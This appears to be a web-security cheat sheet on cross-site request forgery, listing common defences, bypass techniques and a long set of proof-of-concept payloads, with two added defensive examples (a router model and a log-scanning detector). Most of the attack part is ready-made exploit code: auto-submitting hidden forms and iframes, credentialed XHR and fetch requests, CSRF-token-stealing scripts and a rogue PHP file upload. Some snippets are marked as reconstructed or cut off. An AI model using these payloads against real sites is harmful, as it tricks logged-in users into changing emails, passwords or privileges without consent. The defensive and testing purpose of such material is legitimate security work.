CSRF (Cross Site Request Forgery)

What is CSRF?

Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. This is done by making a user who is logged in to the victim platform visit an attacker-controlled website, from which malicious JS code is executed, forms are sent or "images" are retrieved against the victim's account.


In order to be able to abuse a CSRF vulnerability you first need to find a relevant action to abuse (change password or email, make the victim follow you on a social network, give you more privileges...). The session must rely only on cookies or the HTTP Basic Authentication header; any other header can't be used to handle the session. And finally, there shouldn't be unpredictable parameters in the request.
Several counter-measures could be in place to avoid this vulnerability.

Common defenses

  • SameSite cookies: If the session cookie is using this flag, you may not be able to send the cookie from arbitrary web sites.
  • Cross-origin resource sharing: Depending on which kind of HTTP request you need to perform to abuse the relevant action, you may need to take into account the CORS policy of the victim site. Note that the CORS policy won't matter if you just want to send a GET request or a POST request from a form and you don't need to read the response.
  • Asking the user for their password to authorise the action.
  • Resolving a captcha.
  • Reading the Referrer or Origin headers. If a regex is used it could be bypassed, for example with:
    • (ends with the url)
    • (starts with the url)
  • Modifying the names of the parameters of the POST or GET request.
  • Using a CSRF token in each session. This token has to be sent inside the request to confirm the action. This token could be protected with CORS.

CSRF map

Defences Bypass

From POST to GET

Maybe the form you want to abuse is prepared to send a POST request with a CSRF token, but you should check if a GET is also valid and whether the CSRF token is still validated when you send a GET request.

Lack of token

Some applications correctly validate the token when it is present but skip the validation if the token is omitted. In this situation, the attacker can remove the entire parameter containing the token (not just its value) to bypass the validation and deliver a CSRF attack.

CSRF token is not tied to the user session

Some applications do not validate that the token belongs to the same session as the user who is making the request. Instead, the application maintains a global pool of tokens that it has issued and accepts any token that appears in this pool. In this situation, the attacker can log in to the application using their own account, obtain a valid token, and then feed that token to the victim user in their CSRF attack.

Method bypass

If the request is using a "weird" method, check if the method override functionality is working. For example, if it's using a PUT method you can try to use a POST method and send:
This also works by sending the _method parameter inside a POST request or by using one of these headers:
  • X-HTTP-Method
  • X-HTTP-Method-Override
  • X-Method-Override

Custom header token bypass

If the request is adding a custom header with a token to the request as a CSRF protection method, then:
  • Test the request without the customized token and also without the header.
  • Test the request with a token of exactly the same length but a different value.
In a further variation on the preceding vulnerability, some applications duplicate each token within a cookie and a request parameter. Or they set a CSRF cookie and then check in the backend whether the CSRF token sent is the one related to the cookie.
When the subsequent request is validated, the application simply verifies that the token submitted in the request parameter matches the value stored by the cookie. In this situation, the attacker can again perform a CSRF attack if the web site contains any vulnerability that would allow him to set his CSRF cookie on the victim, like a CRLF injection.
In this case you can set the cookie by trying to load a fake image and then launch the CSRF attack like in this example:
```html
<!-- CSRF PoC - generated by Burp Suite Professional -->
<script>history.pushState('', '', '/')</script>
<form action="" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="hidden" name="csrf" value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" />
<input type="submit" value="Submit request" />
</form>
<!-- the "image" request sets the cookie; when it fails to load as an image the form is submitted -->
<img src="" onerror="document.forms[0].submit();"/>
```
Note that if the CSRF token is related to the session cookie this attack won't work, because you would need to set the victim to your session, and therefore you would be attacking yourself.

Content-Type change

According to this, in order to avoid preflight requests when using the POST method these are the allowed Content-Type values:
  • application/x-www-form-urlencoded
  • multipart/form-data
  • text/plain
However, note that the server's logic may vary depending on the Content-Type used, so you should try the values mentioned and others like application/json, text/xml, application/xml.
Example (from here) of sending JSON data as text/plain:
```html
<form id="form" method="post" action="" enctype="text/plain">
<input name='{"garbageeeee":"' value='", "yep": "yep yep yep", "url": "https://webhook/"}'>
</form>
<script>form.submit();</script>
```

application/json preflight request bypass

As you already know, you cannot send a POST request with the Content-Type application/json via an HTML form, and if you try to do so via XMLHttpRequest a preflight request is sent first. However, you could try to send the JSON data using the content types text/plain and application/x-www-form-urlencoded just to check if the backend is using the data independently of the Content-Type. You can send a form using Content-Type: text/plain by setting enctype="text/plain".
If the server is only accepting the content type "application/json", you can send the content type "text/plain; application/json" without triggering a preflight request.
You could also try to bypass this restriction by using a SWF flash file. For more information read this post.

Referrer / Origin check bypass

Avoid Referrer header
Some applications validate the Referer header when it is present in requests but skip the validation if the header is omitted. The following meta tag stops the browser from sending it:
```html
<meta name="referrer" content="never">
```
Regexp bypasses
To make the domain name of the server appear inside the query parameters of the URL that the Referrer header is going to carry, you can do:
```html
<!-- Referrer policy needed to send the query parameter in the referrer -->
<head><meta name="referrer" content="unsafe-url"></head>
<script>history.pushState('', '', '/')</script>
<form action="" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="submit" value="Submit request" />
</form>
<script>
// You need to set this or the domain won't appear in the query of the referer header
// (the domain goes after the "?"; its value is omitted on this page)
history.pushState("", "", "?")
</script>
```

HEAD method bypass

The first part of this CTF writeup explains that in Oak's source code a router is set to handle HEAD requests as GET requests with no response body - a common workaround that isn't unique to Oak. Instead of a specific handler that deals with HEAD requests, they're simply given to the GET handler and the app just removes the response body.
Therefore, if a GET request is being limited, you could just send a HEAD request that will be processed as a GET request.
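How the Referrer/Origin, method-override, Content-Type and HEAD tricks from the sections above are closed on the server side, as an added example that is not code from the original page or from Oak. It is a small router model: the request shape `{ method, path, headers, body }` (header names lower-cased, as Node does), the route names and the allowed origin are assumptions made for the demo.

```javascript
// Added example, not from the original page: a tiny router model showing how
// the Referrer/Origin, method-override, Content-Type and HEAD tricks are closed.
// Request shape ({ method, path, headers, body }), route names and the
// allowed origin are assumptions made for the demo.

const ALLOWED_ORIGINS = new Set(["https://app.example"]); // constructed value
const UNSAFE = new Set(["POST", "PUT", "PATCH", "DELETE"]);

// 1. Provenance: compare the full origin exactly and fail closed when the
//    headers are absent. A regex such as /^https:\/\/app\.example/ or
//    /app\.example$/ is what the "starts with" / "ends with" bypasses defeat;
//    URL.origin cannot be padded on either side.
function originAllowed(headers) {
  if (headers.origin) return ALLOWED_ORIGINS.has(headers.origin);
  if (!headers.referer) return false; // a suppressed Referer must not pass
  try { return ALLOWED_ORIGINS.has(new URL(headers.referer).origin); } catch { return false; }
}

// 2. Content-Type: the media type is everything before the first ';', so
//    "text/plain; application/json" is text/plain and is never parsed as JSON.
function mediaType(ct) {
  return typeof ct === "string" ? ct.split(";")[0].trim().toLowerCase() : "";
}

function parseJsonBody(headers, raw) {
  if (mediaType(headers["content-type"]) !== "application/json") {
    return { ok: false, reason: "unsupported content-type" };
  }
  try { return { ok: true, value: JSON.parse(raw) }; } catch { return { ok: false, reason: "invalid json" }; }
}

// 3. Routing: state-changing handlers are registered on unsafe methods only,
//    HEAD is answered by the GET handler minus the body (so it can never reach
//    a mutating handler), and a method override is read only from a POST and
//    still has to pass the CSRF and origin checks like any unsafe request.
const routes = {
  "GET /profile": "showProfile",
  "POST /profile": "updateProfile",
  "DELETE /profile": "deleteProfile",
};

function dispatch(req, csrfValid) {
  let method = req.method.toUpperCase();
  if (method === "POST") {
    const h = req.headers;
    const override = h["x-http-method-override"] || h["x-http-method"] || h["x-method-override"]
      || (req.body && req.body._method) || "";
    if (override) method = String(override).toUpperCase();
  }
  if (method === "HEAD") {
    const handler = routes["GET " + req.path];
    return handler ? { handler, stripBody: true } : { status: 404 };
  }
  if (UNSAFE.has(method) && !(csrfValid && originAllowed(req.headers))) {
    return { status: 403, reason: "csrf" };
  }
  const handler = routes[method + " " + req.path];
  return handler ? { handler, stripBody: false } : { status: 405 };
}
```

The `csrfValid` argument stands for the result of the token check; the point of `dispatch` is that an override can never widen what a request without a valid token is allowed to do, and that `?_method=DELETE` on a GET is simply ignored.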

Exploit Examples

Exfiltrating CSRF Token

If a CSRF token is being used as a defence you could try to exfiltrate it by abusing an XSS vulnerability or a Dangling Markup vulnerability.

GET using HTML tags

```html
<img src="" style="display:none" />
<h1>404 - Page not found</h1>
The URL you are requesting is no longer available
```
Other HTML5 tags that can be used to automatically send a GET request are:

Form GET request

```html
<!-- CSRF PoC - generated by Burp Suite Professional -->
<script>history.pushState('', '', '/')</script>
<form method="GET" action="">
<input type="hidden" name="email" value="[email protected]" />
<input type="submit" value="Submit request" />
</form>
```

Form POST request

```html
<script>history.pushState('', '', '/')</script>
<form method="POST" action="" id="csrfform">
<input type="hidden" name="email" value="[email protected]" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
<input type="submit" value="Submit request" />
</form>
<img src=x onerror="csrfform.submit();" /> <!-- Way 2 to autosubmit -->
<script>document.forms[0].submit();</script> <!-- Way 3 to autosubmit -->
```

Form POST request through iframe

The request is sent through the iframe without reloading the page.
```html
<iframe style="display:none" name="csrfframe"></iframe>
<form method="POST" action="/change-email" id="csrfform" target="csrfframe">
<input type="hidden" name="email" value="[email protected]" autofocus onfocus="csrfform.submit();" />
<input type="submit" value="Submit request" />
</form>
```

Ajax POST request

```javascript
var xh;
if (window.XMLHttpRequest) {
    // code for IE7+, Firefox, Chrome, Opera, Safari
    xh = new XMLHttpRequest();
} else {
    // code for IE6, IE5
    xh = new ActiveXObject("Microsoft.XMLHTTP");
}
xh.withCredentials = true;
xh.open("POST", "");
// to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xh.send("param=value&param2=value2");

// jQuery version
$.ajax({
    type: "POST",
    url: "",
    data: "param=value&param2=value2"
});
```

multipart/form-data POST request

```javascript
myFormData = new FormData();
var blob = new Blob(["<?php phpinfo(); ?>"], { type: "text/text"});
myFormData.append("newAttachment", blob, "pwned.php");
fetch("http://example/some/path", {
    method: "post",
    body: myFormData,
    credentials: "include",
    // no Content-Type header set by hand: the browser adds multipart/form-data with its boundary
    mode: "no-cors"
});
```

multipart/form-data POST request v2

```javascript
// fileData, nameVar, fileName, ctype and url come from the caller; placeholder values here
var fileData = "sample file content", nameVar = "file", fileName = "sample.txt",
    ctype = "text/plain", url = "";
var fileSize = fileData.length,
    boundary = "OWNEDBYOFFSEC",
    xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open("POST", url, true);
// MIME POST request.
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + boundary);
// Content-Length is a forbidden header name: the browser computes it itself and ignores any value set here
var body = "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="' + nameVar + '"; filename="' + fileName + '"\r\n';
body += "Content-Type: " + ctype + "\r\n\r\n";
body += fileData + "\r\n";
body += "--" + boundary + "--";
xhr.send(body);
```
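Every PoC in this section (image, form, iframe, XHR or fetch) reaches the server as a cross-site request, and the browser says so in headers the page cannot control. The following is an added example, not code from the original page, of detection logic that scans constructed web-server log lines for state-changing requests whose Fetch Metadata or Origin header shows they did not come from the site itself. The log format, the sample lines, the site name and the list of mutating GET paths are all constructed for the demo.

```javascript
// Added example, not part of the original page: flag state-changing requests
// that did not originate from our own site. Log format, sample lines, OWN_ORIGIN
// and MUTATING_GET_PATHS are constructed assumptions for the demo.

const OWN_ORIGIN = "https://app.example"; // constructed

// Constructed sample lines; "-" marks an absent header.
// Fields: method target status sec-fetch-site sec-fetch-mode origin referer
const SAMPLE_LOG = [
  "POST /change-email 302 same-origin navigate https://app.example https://app.example/account",
  "POST /change-email 302 cross-site navigate https://evil.test https://evil.test/poc.html",
  "GET /change-email?email=x 200 cross-site no-cors - https://evil.test/poc.html",
  "POST /change-email 302 cross-site cors https://evil.test -",
  "POST /api/upload 200 - - - -",
  "GET /account 200 same-origin navigate - https://app.example/",
  "POST /login 200 - - https://app.example.evil.test -",
].join("\n");

const UNSAFE = new Set(["POST", "PUT", "PATCH", "DELETE"]);
// GET endpoints known to mutate state are watched as well (the "From POST to GET" case).
const MUTATING_GET_PATHS = ["/change-email"];

function parseLine(line) {
  const [method, target, status, site, mode, origin, referer] = line.split(" ");
  return { method, path: target.split("?")[0], status: Number(status), site, mode, origin, referer };
}

function isStateChanging(e) {
  return UNSAFE.has(e.method) || (e.method === "GET" && MUTATING_GET_PATHS.includes(e.path));
}

// Returns an alert label, or null when the entry looks benign.
function classify(e) {
  if (!isStateChanging(e)) return null;
  // Fetch Metadata is the strongest signal: the browser sets it, the page cannot.
  if (e.site === "cross-site" || e.site === "cross-origin") return "cross-site-fetch-metadata";
  // Origin present but not ours; compared exactly, never by prefix or suffix.
  if (e.origin !== "-" && e.origin !== OWN_ORIGIN) return "foreign-origin";
  // No provenance at all on a state change: a non-browser client, or a page
  // that suppressed Referer (e.g. <meta name="referrer" content="never">).
  if (e.site === "-" && e.origin === "-" && e.referer === "-") return "no-provenance";
  return null;
}

function findSuspicious(logText) {
  return logText.split("\n").filter(Boolean).map(parseLine)
    .map(e => ({ ...e, alert: classify(e) }))
    .filter(e => e.alert);
}
```

Running `findSuspicious(SAMPLE_LOG)` returns the five constructed entries that are worth a look and leaves the two same-origin lines alone. In a real deployment the same three checks belong in the application's request handling as a block, with the log scan as the backstop for endpoints that were missed.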

Form POST request from within an iframe

```html
<!-- expl.html -->
<body onload="envia()">
<form method="POST" id="formulario" action="">
<input type="text" id="pwd" name="pwd" value="otra nueva">
</form>
<script>
function envia(){document.getElementById("formulario").submit();}
</script>
</body>

<!-- public.html -->
<iframe src="2-1.html" style="position:absolute;top:-5000"></iframe>
<h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>
```

Steal CSRF Token and send a POST request

```javascript
function submitFormWithTokenJS(token) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", POST_URL, true);
    xhr.withCredentials = true;
    // Send the proper header information along with the request
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    // This is for debugging and can be removed
    xhr.onreadystatechange = function() {
        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            //console.log(xhr.responseText);
        }
    };
    xhr.send("token=" + token + "&otherparama=heyyyy");
}

function getTokenJS() {
    var xhr = new XMLHttpRequest();
    // This tells it to return it as a HTML document
    xhr.responseType = "document";
    xhr.withCredentials = true;
    // true on the end of here makes the call asynchronous
    xhr.open("GET", GET_URL, true);
    xhr.onload = function (e) {
        if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
            // Get the document from the response
            page = xhr.response
            // Get the input element
            input = page.getElementById("token");
            // Show the token
            //console.log("The token is: " + input.value);
            // Use the token to submit the form
            submitFormWithTokenJS(input.value);
        }
    };
    // Make the request
    xhr.send(null);
}

var GET_URL = ""
var POST_URL = ""
getTokenJS();
```

Steal CSRF Token and send a Post request using an iframe, a form and Ajax

```html
<form id="form1" action="" method="post" enctype="multipart/form-data">
<input type="text" name="username" value="AA">
<input type="checkbox" name="status" checked="checked">
<input id="token" type="hidden" name="token" value="" />
</form>
<script type="text/javascript">
function f1(){
    // body cut off on the page; reconstructed: read the token from the hidden iframe, copy it into the form and submit
    var x1 = document.getElementById("i1");
    var x1d = (x1.contentWindow || x1.contentDocument);
    var t = x1d.document.getElementById("token").value;
    document.getElementById("token").value = t;
    document.getElementById("form1").submit();
}
</script>
<iframe id="i1" style="display:none" src="" onload="javascript:f1();"></iframe>
```

Steal CSRF Token and send a POST request using an iframe and a form

```html
<iframe id="iframe" src="" width="500" height="500" onload="read()"></iframe>
<script>
function read()
{
    var name = 'admin2';
    var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
    document.writeln('<form width="0" height="0" method="post" action="" enctype="multipart/form-data">');
    document.writeln('<input id="username" type="text" name="username" value="' + name + '" /><br />');
    document.writeln('<input id="token" type="hidden" name="token" value="' + token + '" />');
    document.writeln('<input type="submit" name="submit" value="Submit" /><br/>');
    document.writeln('</form>');
}
</script>
```

Steal token and send it using 2 iframes

```html
<script>
var token;
function readframe1(){
    token = frame1.document.getElementById("profile").token.value;
    document.getElementById("bypass").token.value = token;
    loadframe2();
}
function loadframe2(){
    var test = document.getElementById("frame2");
    test.src = "" + token;
}
</script>
<iframe id="frame1" name="frame1" src="" onload="readframe1()"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>
<iframe id="frame2" name="frame2"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>
<body onload="document.forms[0].submit()">
<form id="bypass" name="bypass" method="POST" target="frame2" action="" enctype="multipart/form-data">
<input type="text" name="username" value="z">
<input type="checkbox" name="status" checked="">
<input id="token" type="hidden" name="token" value="0000" />
<button type="submit">Submit</button>
</form>
</body>
```

Steal CSRF token with Ajax and send a POST with a form

```html
<body onload="getData()">
<form id="form" action="" method="POST" enctype="multipart/form-data">
<input type="hidden" name="username" value="root"/>
<input type="hidden" name="status" value="on"/>
<input type="hidden" id="findtoken" name="token" value=""/>
<input type="submit" value="valider"/>
</form>
<script>
var x = new XMLHttpRequest();
function getData() {
    x.withCredentials = true;
    x.open("GET", "", true);
    x.onreadystatechange = function() {
        if (x.readyState == XMLHttpRequest.DONE) {
            var token = x.responseText.match(/name="token" value="(.+)"/)[1];
            document.getElementById("findtoken").value = token;
            document.getElementById("form").submit();
        }
    };
    x.send(null);
}
</script>
</body>
```

CSRF with Socket.IO

```html
<script src=""></script>
<script>
let socket = io('');
const username = 'admin'
socket.on('connect', () => {
    socket.emit('join', {
        room: username
    });
    socket.emit('my_room_event', {
        // event payload is cut off on the original page
    });
});
</script>
```